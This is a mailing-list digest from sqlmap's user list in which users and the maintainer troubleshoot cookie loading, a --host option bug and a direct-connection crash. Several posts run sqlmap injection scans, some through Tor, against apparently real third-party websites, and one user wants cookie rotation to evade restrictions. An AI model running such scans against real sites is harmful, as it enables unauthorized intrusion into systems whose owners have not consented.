> >         >     >     Hi folks,
> >         >     >
> >         >     >     .... that doesn't work for me. It always uses the
> cookie supplied
> >         >     >     (below in $REQUEST, or if I omit the line in
> $REQUEST the one
> >         >     >     from the 1st server reply is being used)
> >         >     >
> >         >     >     So what is wrong in here:
> >         >     >
> >         >     >     cd
> ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> >         >     >     ./sqlmap.py --ignore-proxy --force-ssl --beep \
> >         >     >       --threads=8 -v 6 --load-cookies=$WD/cookie-file \
> >         >     >       --level=2 --risk=2 -r $REQUEST
> >         >     >
> >         >     >     The content of the file $REQUEST is:
> >         >     >
> >         >     >     POST <URL> HTTP/1.1
> >         >     >     Host: <HOST>
> >         >     >     User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2;
> en-US) AppleWebKit/525.13 (KHTML, like Gecko)
> >         >     >     Chrome/0.2.149.6 <http://0.2.149.6> <
> http://0.2.149.6> <http://0.2.149.6> Safari/525.13
> >         >     >     Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> >         >     >     Accept-Language: en-US,en;q=0.5
> >         >     >     Accept-Encoding: gzip, deflate
> >         >     >     Referer: <Referer>
> >         >     >     Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> >         >     >     Connection: keep-alive
> >         >     >     Content-Type: application/x-www-form-urlencoded
> >         >     >     Content-Length: 67
> >         >     >
> >         >     >     <abunchofpostparams>
> >         >     >
> >         >     >
> >         >     >     No hints that cookie-file is not in correct format
> (I've been through this,
> >         >     >     at least I think I so ;) ).
> >         >     >
> >         >     >     Any insight would be much appreciated.
> >         >     >
> >         >     >
> >         >     >     Cheers,
> >         >     >
> >         >     >     Dirk
> >         >     >
> >         >     >
> >         >     >
> ------------------------------------------------------------------------------
> >         >     >     Precog is a next-generation analytics platform
> capable of advanced
> >         >     >     analytics on semi-structured data. The platform
> includes APIs for building
> >         >     >     apps and a phenomenal toolset for data science.
> Developers can use
> >         >     >     our toolset for easy data analysis & visualization.
> Get a free account!
> >         >     >
> http://www2.precog.com/precogplatform/slashdotnewsletter
> >         >     >     _______________________________________________
> >         >     >     sqlmap-users mailing list
> >         >     >     sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>> <mailto:
> sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>>>
> >         >     >
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >         >     >
> >         >     >
> >         >     >
> >         >     >
> >         >     > --
> >         >     > Miroslav Stampar
> >         >     > http://about.me/stamparm
> >         >
> >         >
> >         >
> >         >
> >         > --
> >         > Miroslav Stampar
> >         > http://about.me/stamparm
> >
> >
> >
> >
> >     --
> >     Miroslav Stampar
> >     http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
>
>
>
>
> ------------------------------
>
> Message: 3
> Date: Mon, 15 Apr 2013 11:45:19 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] --load-cookies
> To: Dirk Wetter <sp...@dr...>
> Cc: SqlMap List <sql...@li...>
> Message-ID:
> <CA+9yoX0yAGFkCiLuycVqdbm8jvnMeEPgJdXoYZi_4NTW-YQo=Q...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi Dirk.
>
> Now that crash should be "patched".
>
> Could you please retry it now and say if the latest revision suits your
> needs?
>
> Kind regards,
> Miroslav Stampar
>
>
> On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...> wrote:
>
> >
> >
> > On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> > > Nevertheless, with the latest commit that check should be "neutralized"
> > now. Could you please retry it now?
> >
> > thx, Miroslav.  I tried (b6fee63) but this time the cookie parser lib
> > hiccups, using the same file:
> >
> > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib
> bug!
> > Traceback (most recent call last):
> >   File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
> > _really_load
> >     assert domain_specified == initial_dot
> > AssertionError
> >
> >   _warn_unhandled_exception()
> > [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid
> > Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
> >
> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
> >
> > the 999.. looks strange to me.
> >
> > >
> > >
> > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
> > mir...@gm... <mailto:mir...@gm...>> wrote:
> > >
> > >     Hi Dirk.
> > >
> > >     Well, I would say that you have an expired cookie. Do you see that
> > value 0? That value should be a valid UNIX time representing time of
> cookie
> > expiration. Also, I've just tested that cookie of yours and sqlmap says:
> > "[WARNING] cookie '....' has expired"
> > >
> >
> > that's true but IMO 0 represents just a session cookie. Example:
> >
> > prompt% wget -q -O /dev/null --keep-session-cookies
> > --save-cookies=/dev/stdout bing.com
> > # HTTP cookie file.
> > # Generated by Wget on 2013-04-15 11:23:13.
> > # Edit at your own risk.
> >
> > .bing.com       TRUE    /       FALSE   1429089794      SRCHUSR
> > AUTOREDIR=0&GEOVAR=&DOB=20130415
> > .bing.com       TRUE    /       FALSE   1429089794      SRCHD
> > D=2781203&MS=2781203&AF=NOFORM
> > .bing.com       TRUE    /       FALSE   1429089794      OrigMUID
> >  333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
> > .bing.com       TRUE    /       FALSE   1429089794      MUID
> >  333995A69E06630B2EB491169F016314
> > .bing.com       TRUE    /       FALSE   0       _SS
> > SID=B954CB7EDF8643CABAD8013F27A241E7
> > .bing.com       TRUE    /       FALSE   0       _HOP
> > .bing.com       TRUE    /       FALSE   0       _FS     NU=1
> > .bing.com       TRUE    /       FALSE   1429089794      _FP     EM=1
> > www.bing.com    FALSE   /       FALSE   1429089794      SRCHUID
> > V=2&GUID=975091780DFF407DA9DD07139FD97C4D
> > www.bing.com    FALSE   /       FALSE   1429089794      MUIDB
> > 333995A69E06630B2EB491169F016314
> >
> > prompt%
> >
> > Same parser problem btw if I edit the cookie file and put 1429089794 unix
> > time instead of 0 in there.
> >
> > Ok: With the prev rev  ed5599f it reads this file ok (no session cookies
> > but cookies w/ expiration date) and uses the last
> > cookie only for the first 120 tries.
> >
> > Cheers, Dirk
> >
> >
> > >
> > >     Kind regards,
> > >     Miroslav Stampar
> > >
> > >
> > >     On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...
> <mailto:
> > sp...@dr...>> wrote:
> > >
> > >
> > >         Hi Miroslav,
> > >
> > >         thx for your prompt answer.
> > >
> > >         On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> > >         > Hi Dirk.
> > >         >
> > >         > Could you please get the latest revision and retry it again?
> > >         ed5599f: almost the same: with cookie in the header sqlmap
> takes
> > only this one.
> > >         The slight difference seems to be that in the case where I
> > didn't supply a cookie
> > >         sqlmap doesn't use any cookie at all, i.e. now not the one from
> > the server anymore.
> > >         >
> > >         > There was a situation where info messages have been wrongly
> > written that original response contained Set-Cookie in situations like
> > yours.
> > >         >
> > >         > In case that everything stays as it is, I'll need to ask you
> > to provide more details. For example, cookie file would be great.
> > >
> > >         sure, here you go:
> > >
> > >         --snip
> > >         # Netscape HTTP Cookie File
> > >         <FQDN>  \t  FALSE  \t  <path>  \t  TRUE  \t  0  \t  JSESSIONID
> >  \t  <Cookie>
> > >         [..]
> > >         --snap
> > >
> > >         They are all session cookies. For easier reading here I put
> some
> > blanks in the line
> > >         above, in "cookie-file" there aren't any though. Cookies were
> > generated with
> > >         stompy and a shell script (looks he same as with
> > >         wget -S -O /dev/null --keep-session-cookies
> > --save-cookies=<file> <URL>)
> > >
> > >         Again: sqlmap doesn't hiccup/complain while eating my cookies
> > file ;-)
> > >
> > >         >
> > >         > Also, please make sure that the cookie file contains proper
> > cookie(s) - domain name should be the same as a domain of target, cookie
> > needs to have a proper valid time, etc.
> > >
> > >         see above.
> > >
> > >         Cheers,
> > >
> > >         Dirk
> > >
> > >         >
> > >         >
> > >         > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <
> > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...
> <mailto:
> > sp...@dr...>>> wrote:
> > >         >
> > >         >     Hi Miroslav,
> > >         >
> > >         >     yes unfortunately.
> > >         >
> > >         >     If I omit the cookie line in the request header
> > completely, sqlmap
> > >         >     seems to take the first cookie issued by the server with
> > set-cookie (and
> > >         >     put's it silently in).
> > >         >
> > >         >     Cheers,
> > >         >
> > >         >     Dirk
> > >         >
> > >         >
> > >         >
> > >         >     On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> > >         >     > Hi.
> > >         >     >
> > >         >     > And this is also happening if you are skipping "Cookie:
> > JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
> > >         >     >
> > >         >     > Kind regards,
> > >         >     > Miroslav Stampar
> > >         >     >
> > >         >     >
> > >         >     > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <
> > sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...
> <mailto:
> > sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> > <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
> > >         >     >
> > >         >     >
> > >         >     >     Hi folks,
> > >         >     >
> > >         >     >     .... that doesn't work for me. It always uses the
> > cookie supplied
> > >         >     >     (below in $REQUEST, or if I omit the line in
> > $REQUEST the one
> > >         >     >     from the 1st server reply is being used)
> > >         >     >
> > >         >     >     So what is wrong in here:
> > >         >     >
> > >         >     >     cd
> > ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> > >         >     >     ./sqlmap.py --ignore-proxy --force-ssl --beep \
> > >         >     >       --threads=8 -v 6 --load-cookies=$WD/cookie-file \
> > >         >     >       --level=2 --risk=2 -r $REQUEST
> > >         >     >
> > >         >     >     The content of the file $REQUEST is:
> > >         >     >
> > >         >     >     POST <URL> HTTP/1.1
> > >         >     >     Host: <HOST>
> > >         >     >     User-Agent: Mozilla/5.0 (Windows; U; Windows NT
> 5.2;
> > en-US) AppleWebKit/525.13 (KHTML, like Gecko)
> > >         >     >     Chrome/0.2.149.6 <http://0.2.149.6> <
> > http://0.2.149.6> <http://0.2.149.6> Safari/525.13
> > >         >     >     Accept:
> > text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> > >         >     >     Accept-Language: en-US,en;q=0.5
> > >         >     >     Accept-Encoding: gzip, deflate
> > >         >     >     Referer: <Referer>
> > >         >     >     Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> > >         >     >     Connection: keep-alive
> > >         >     >     Content-Type: application/x-www-form-urlencoded
> > >         >     >     Content-Length: 67
> > >         >     >
> > >         >     >     <abunchofpostparams>
> > >         >     >
> > >         >     >
> > >         >     >     No hints that cookie-file is not in correct format
> > (I've been through this,
> > >         >     >     at least I think I so ;) ).
> > >         >     >
> > >         >     >     Any insight would be much appreciated.
> > >         >     >
> > >         >     >
> > >         >     >     Cheers,
> > >         >     >
> > >         >     >     Dirk
> > >         >     >
> > >         >     >
> > >         >     >
> >
> ------------------------------------------------------------------------------
> > >         >     >     Precog is a next-generation analytics platform
> > capable of advanced
> > >         >     >     analytics on semi-structured data. The platform
> > includes APIs for building
> > >         >     >     apps and a phenomenal toolset for data science.
> > Developers can use
> > >         >     >     our toolset for easy data analysis & visualization.
> > Get a free account!
> > >         >     >
> > http://www2.precog.com/precogplatform/slashdotnewsletter
> > >         >     >     _______________________________________________
> > >         >     >     sqlmap-users mailing list
> > >         >     >     sql...@li... <mailto:
> > sql...@li...> <mailto:
> > sql...@li... <mailto:
> > sql...@li...>> <mailto:
> > sql...@li... <mailto:
> > sql...@li...> <mailto:
> > sql...@li... <mailto:
> > sql...@li...>>>
> > >         >     >
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> > >         >     >
> > >         >     >
> > >         >     >
> > >         >     >
> > >         >     > --
> > >         >     > Miroslav Stampar
> > >         >     > http://about.me/stamparm
> > >         >
> > >         >
> > >         >
> > >         >
> > >         > --
> > >         > Miroslav Stampar
> > >         > http://about.me/stamparm
> > >
> > >
> > >
> > >
> > >     --
> > >     Miroslav Stampar
> > >     http://about.me/stamparm
> > >
> > >
> > >
> > >
> > > --
> > > Miroslav Stampar
> > > http://about.me/stamparm
> >
> >
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 4
> Date: Mon, 15 Apr 2013 11:46:21 +0200
> From: Miroslav Stampar <mir...@gm...>
> Subject: Re: [sqlmap-users] Patch for /task/<task_id>/delete in
> clean_filesystem
> To: Brandon Perry <bpe...@gm...>
> Cc: sqlmap users <sql...@li...>
> Message-ID:
> <CA+9yoX3RNQDm=PqT...@ma...>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi Brandon.
>
> Thank you for your patch and find it now included [1].
>
> Kind regards,
> Miroslav Stampar
>
> [1]
>
> https://github.com/sqlmapproject/sqlmap/commit/8853e43616e89f26cfd6d1c1540e02ed6b4ca224
>
>
> On Sat, Apr 13, 2013 at 8:36 PM, Brandon Perry <bpe...@gm...
> >wrote:
>
> > Hi, the attached patch fixes an issue with the /task/<task_id>/delete api
> > call when self.output_directory is NoneType and clean_system() is called.
> >
> > --
> > http://volatile-minds.blogspot.com -- blog
> > http://www.volatileminds.net -- website
> >
> >
> >
> ------------------------------------------------------------------------------
> > Precog is a next-generation analytics platform capable of advanced
> > analytics on semi-structured data. The platform includes APIs for
> building
> > apps and a phenomenal toolset for data science. Developers can use
> > our toolset for easy data analysis & visualization. Get a free account!
> > http://www2.precog.com/precogplatform/slashdotnewsletter
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
> >
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
> -------------- next part --------------
> An HTML attachment was scrubbed...
>
> ------------------------------
>
> Message: 5
> Date: Mon, 15 Apr 2013 12:19:13 +0200
> From: Dirk Wetter <sp...@dr...>
> Subject: Re: [sqlmap-users] --load-cookies
> To: Miroslav Stampar <mir...@gm...>
> Cc: SqlMap List <sql...@li...>
> Message-ID: <516...@dr...>
> Content-Type: text/plain; charset=ISO-8859-1
>
> Hi Miroslav,
>
> On 04/15/2013 11:45 AM, Miroslav Stampar wrote:
> > Hi Dirk.
> >
> > Now that crash should be "patched".
> >
> > Could you please retry it now and say if the latest revision suits your
> needs?
>
> cool, thx. Works!
>
> However (sorry):
>
> One needs to omit the cookie in the request header, otherwise it just uses
> the one
> supplied by the request.
>
> Then: It doesn't change the cookie. Maybe I was interpreting that not
> correctly
> but my point was using the load-cookies option to direct sqlmap to change
> cookies once in a while (whenever that's gonna be). This is to circumvent
> restrictions one can encounter otherwise....
>
> Cheers,
>
> Dirk
>
>
> >
> > Kind regards,
> > Miroslav Stampar
> >
> >
> > On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...<mailto:
> sp...@dr...>> wrote:
> >
> >
> >
> >     On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> >     > Nevertheless, with the latest commit that check should be
> "neutralized" now. Could you please retry it now?
> >
> >     thx, Miroslav.  I tried (b6fee63) but this time the cookie parser
> lib hiccups, using the same file:
> >
> >     /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning:
> cookielib bug!
> >     Traceback (most recent call last):
> >       File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
> _really_load
> >         assert domain_specified == initial_dot
> >     AssertionError
> >
> >       _warn_unhandled_exception()
> >     [11:13:26] [CRITICAL] there was a problem loading cookies file
> ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
> >
> >     the 999.. looks strange to me.
> >
> >     >
> >     >
> >     > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
> mir...@gm... <mailto:mir...@gm...> <mailto:
> mir...@gm... <mailto:mir...@gm...>>> wrote:
> >     >
> >     >     Hi Dirk.
> >     >
> >     >     Well, I would say that you have an expired cookie. Do you see
> that value 0? That value should be a valid UNIX time representing time of
> cookie expiration. Also, I've just tested that cookie of yours and sqlmap
> says: "[WARNING] cookie '....' has expired"
> >     >
> >
> >     that's true but IMO 0 represents just a session cookie. Example:
> >
> >     prompt% wget -q -O /dev/null --keep-session-cookies
> --save-cookies=/dev/stdout bing.com <http://bing.com>
> >     # HTTP cookie file.
> >     # Generated by Wget on 2013-04-15 11:23:13.
> >     # Edit at your own risk.
> >
> >     .bing.com <http://bing.com>       TRUE    /       FALSE
> 1429089794      SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
> >     .bing.com <http://bing.com>       TRUE    /       FALSE
> 1429089794      SRCHD   D=2781203&MS=2781203&AF=NOFORM
> >     .bing.com <http://bing.com>       TRUE    /       FALSE
> 1429089794      OrigMUID
> 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
> >     .bing.com <http://bing.com>       TRUE    /       FALSE
> 1429089794      MUID    333995A69E06630B2EB491169F016314
> >     .bing.com <http://bing.com>       TRUE    /       FALSE   0
> _SS     SID=B954CB7EDF8643CABAD8013F27A241E7
> >     .bing.com <http://bing.com>       TRUE    /       FALSE   0
> _HOP
> >     .bing.com <http://bing.com>       TRUE    /       FALSE   0
> _FS     NU=1
> >     .bing.com <http://bing.com>       TRUE    /       FALSE
> 1429089794      _FP     EM=1
> >     www.bing.com <http://www.bing.com>    FALSE   /       FALSE
> 1429089794      SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
> >     www.bing.com <http://www.bing.com>    FALSE   /       FALSE
> 1429089794      MUIDB   333995A69E06630B2EB491169F016314
> >
> >     prompt%
> >
> >     Same parser problem btw if I edit the cookie file and put 1429089794
> unix time instead of 0 in there.
> >
> >     Ok: With the prev rev  ed5599f it reads this file ok (no session
> cookies but cookies w/ expiration date) and uses the last
> >     cookie only for the first 120 tries.
> >
> >     Cheers, Dirk
> >
> >
> >     >
> >     >     Kind regards,
> >     >     Miroslav Stampar
> >     >
> >     >
> >     >     On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>>> wrote:
> >     >
> >     >
> >     >         Hi Miroslav,
> >     >
> >     >         thx for your prompt answer.
> >     >
> >     >         On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> >     >         > Hi Dirk.
> >     >         >
> >     >         > Could you please get the latest revision and retry it
> again?
> >     >         ed5599f: almost the same: with cookie in the header sqlmap
> takes only this one.
> >     >         The slight difference seems to be that in the case where I
> didn't supply a cookie
> >     >         sqlmap doesn't use any cookie at all, i.e. now not the one
> from the server anymore.
> >     >         >
> >     >         > There was a situation where info messages have been
> wrongly written that original response contained Set-Cookie in situations
> like yours.
> >     >         >
> >     >         > In case that everything stays as it is, I'll need to ask
> you to provide more details. For example, cookie file would be great.
> >     >
> >     >         sure, here you go:
> >     >
> >     >         --snip
> >     >         # Netscape HTTP Cookie File
> >     >         <FQDN>  \t  FALSE  \t  <path>  \t  TRUE  \t  0  \t
> JSESSIONID  \t  <Cookie>
> >     >         [..]
> >     >         --snap
> >     >
> >     >         They are all session cookies. For easier reading here I
> put some blanks in the line
> >     >         above, in "cookie-file" there aren't any though. Cookies
> were generated with
> >     >         stompy and a shell script (looks he same as with
> >     >         wget -S -O /dev/null --keep-session-cookies
> --save-cookies=<file> <URL>)
> >     >
> >     >         Again: sqlmap doesn't hiccup/complain while eating my
> cookies file ;-)
> >     >
> >     >         >
> >     >         > Also, please make sure that the cookie file contains
> proper cookie(s) - domain name should be the same as a domain of target,
> cookie needs to have a proper valid time, etc.
> >     >
> >     >         see above.
> >     >
> >     >         Cheers,
> >     >
> >     >         Dirk
> >     >
> >     >         >
> >     >         >
> >     >         > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
> >     >         >
> >     >         >     Hi Miroslav,
> >     >         >
> >     >         >     yes unfortunately.
> >     >         >
> >     >         >     If I omit the cookie line in the request header
> completely, sqlmap
> >     >         >     seems to take the first cookie issued by the server
> with set-cookie (and
> >     >         >     put's it silently in).
> >     >         >
> >     >         >     Cheers,
> >     >         >
> >     >         >     Dirk
> >     >         >
> >     >         >
> >     >         >
> >     >         >     On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> >     >         >     > Hi.
> >     >         >     >
> >     >         >     > And this is also happening if you are skipping
> "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original
> request?
> >     >         >     >
> >     >         >     > Kind regards,
> >     >         >     > Miroslav Stampar
> >     >         >     >
> >     >         >     >
> >     >         >     > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> <mailto:sp...@dr... <mailto:sp...@dr...>>> <mailto:
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> <mailto:sp...@dr... <mailto:sp...@dr...>>>>> wrote:
> >     >         >     >
> >     >         >     >
> >     >         >     >     Hi folks,
> >     >         >     >
> >     >         >     >     .... that doesn't work for me. It always uses
> the cookie supplied
> >     >         >     >     (below in $REQUEST, or if I omit the line in
> $REQUEST the one
> >     >         >     >     from the 1st server reply is being used)
> >     >         >     >
> >     >         >     >     So what is wrong in here:
> >     >         >     >
> >     >         >     >     cd
> ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> >     >         >     >     ./sqlmap.py --ignore-proxy --force-ssl --beep \
> >     >         >     >       --threads=8 -v 6
> --load-cookies=$WD/cookie-file \
> >     >         >     >       --level=2 --risk=2 -r $REQUEST
> >     >         >     >
> >     >         >     >     The content of the file $REQUEST is:
> >     >         >     >
> >     >         >     >     POST <URL> HTTP/1.1
> >     >         >     >     Host: <HOST>
> >     >         >     >     User-Agent: Mozilla/5.0 (Windows; U; Windows
> NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko)
> >     >         >     >     Chrome/0.2.149.6 <http://0.2.149.6> <
> http://0.2.149.6> <http://0.2.149.6> <http://0.2.149.6> Safari/525.13
> >     >         >     >     Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> >     >         >     >     Accept-Language: en-US,en;q=0.5
> >     >         >     >     Accept-Encoding: gzip, deflate
> >     >         >     >     Referer: <Referer>
> >     >         >     >     Cookie:
> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> >     >         >     >     Connection: keep-alive
> >     >         >     >     Content-Type: application/x-www-form-urlencoded
> >     >         >     >     Content-Length: 67
> >     >         >     >
> >     >         >     >     <abunchofpostparams>
> >     >         >     >
> >     >         >     >
> >     >         >     >     No hints that cookie-file is not in correct
> format (I've been through this,
> >     >         >     >     at least I think I so ;) ).
> >     >         >     >
> >     >         >     >     Any insight would be much appreciated.
> >     >         >     >
> >     >         >     >
> >     >         >     >     Cheers,
> >     >         >     >
> >     >         >     >     Dirk
> >     >         >     >
> >     >         >     >
> >     >         >     >
> ------------------------------------------------------------------------------
> >     >         >     >     Precog is a next-generation analytics platform
> capable of advanced
> >     >         >     >     analytics on semi-structured data. The
> platform includes APIs for building
> >     >         >     >     apps and a phenomenal toolset for data
> science. Developers can use
> >     >         >     >     our toolset for easy data analysis &
> visualization. Get a free account!
> >     >         >     >
> http://www2.precog.com/precogplatform/slashdotnewsletter
> >     >         >     >     _______________________________________________
> >     >         >     >     sqlmap-users mailing list
> >     >         >     >     sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>> <mailto:
> sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>>> <mailto:
> sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>> <mailto:
> sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>>>>
> >     >         >     >
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >     >         >     >
> >     >         >     >
> >     >         >     >
> >     >         >     >
> >     >         >     > --
> >     >         >     > Miroslav Stampar
> >     >         >     > http://about.me/stamparm
> >     >         >
> >     >         >
> >     >         >
> >     >         >
> >     >         > --
> >     >         > Miroslav Stampar
> >     >         > http://about.me/stamparm
> >     >
> >     >
> >     >
> >     >
> >     >     --
> >     >     Miroslav Stampar
> >     >     http://about.me/stamparm
> >     >
> >     >
> >     >
> >     >
> >     > --
> >     > Miroslav Stampar
> >     > http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
>
>
>
>
> ------------------------------
>
> Message: 6
> Date: Mon, 15 Apr 2013 14:01:01 -0700
> From: <co...@5i...>
> Subject: [sqlmap-users] --host parameter
> To: sql...@li...
> Message-ID:
> <
> 201...@em...
> >
>
> Content-Type: text/plain; charset="utf-8"
>
> Hello,
> the --host doesn't work as expected, or I am doing something wrong:
>
>
> this works as expected:
>
> ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
>
>     sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> takeover tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility to
> obey all applicable local, state and federal laws. Developers assume no
> liability and are not responsible for any misuse or damage caused by
> this program
>
> [*] starting at 23:57:15
>
> [23:57:15] [INFO] testing connection to the target URL
> [23:57:15] [INFO] heuristics detected web page charset 'ascii'
> [23:57:15] [INFO] testing if the target URL is stable. This can take a
> couple of seconds
> [23:57:16] [INFO] target URL is stable
> [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
> [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
> [23:57:16] [INFO] GET parameter 'id' is dynamic
> [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
> might be injectable (possible DBMS: 'MySQL')
> [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
>
>
> ....
>
>
> this doesn't work as expected:
>
>  ./sqlmap.py --host='i.csland.ro'
> --url='http://188.240.236.15/index.php?id=0'
>
>     sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> takeover tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility to
> obey all applicable local, state and federal laws. Developers assume no
> liability and are not responsible for any misuse or damage caused by
> this program
>
> [*] starting at 23:58:03
>
> [23:58:03] [INFO] testing connection to the target URL
> [23:58:03] [CRITICAL] page not found (404)
> it is not recommended to continue in this kind of cases. Do you want to
> quit and make sure that everything is set up properly? [Y/n]
> [23:58:05] [WARNING] HTTP error codes detected during run:
>
> ............
>
>
> Of course i.csland.ro resolves to 188.240.236.15. Any idea?
>
> Thanks.
>
>
>
>
> ------------------------------
>
> Message: 7
> Date: Tue, 16 Apr 2013 09:12:05 +1100
> From: ???????? ?????? <vo...@s2...>
> Subject: [sqlmap-users] Sqlmap and direct connect error
> To: sql...@li...
> Message-ID: <C59...@s2...>
> Content-Type: text/plain; charset=us-ascii
>
> Hi!
>
> This bug detected if add direct param.
>
> python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "
> http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor
> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux  --tables
> --exclude-sysdbs
>
>
> [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, retry
> your run with the latest development version from the GitHub repository. If
> the exception persists, please send by e-mail to '
> sql...@li...' or open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-de99717
> Python version: 2.7.3
> Operating system: posix
> Command line: sqlmap.py -d
> **************************************************** -u
> http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor
> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
> --exclude-sysdbs
> Technique: None
> Back-end DBMS: MySQL (identified)
> Traceback (most recent call last):
>   File "sqlmap.py", line 87, in main
>     start()
>   File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in
> start
>     action()
>   File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action
>     setHandler()
>   File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in
> setHandler
>     conf.dbmsConnector.connect()
>   File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in
> connect
>     self.connector = pymysql.connect(host=self.hostname, user=self.user,
> passwd=self.password, db=self.db, port=self.port,
> connect_timeout=conf.timeout, use_unicode=True)
>   File
> "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py",
> line 93, in Connect
>     return Connection(*args, **kwargs)
>   File
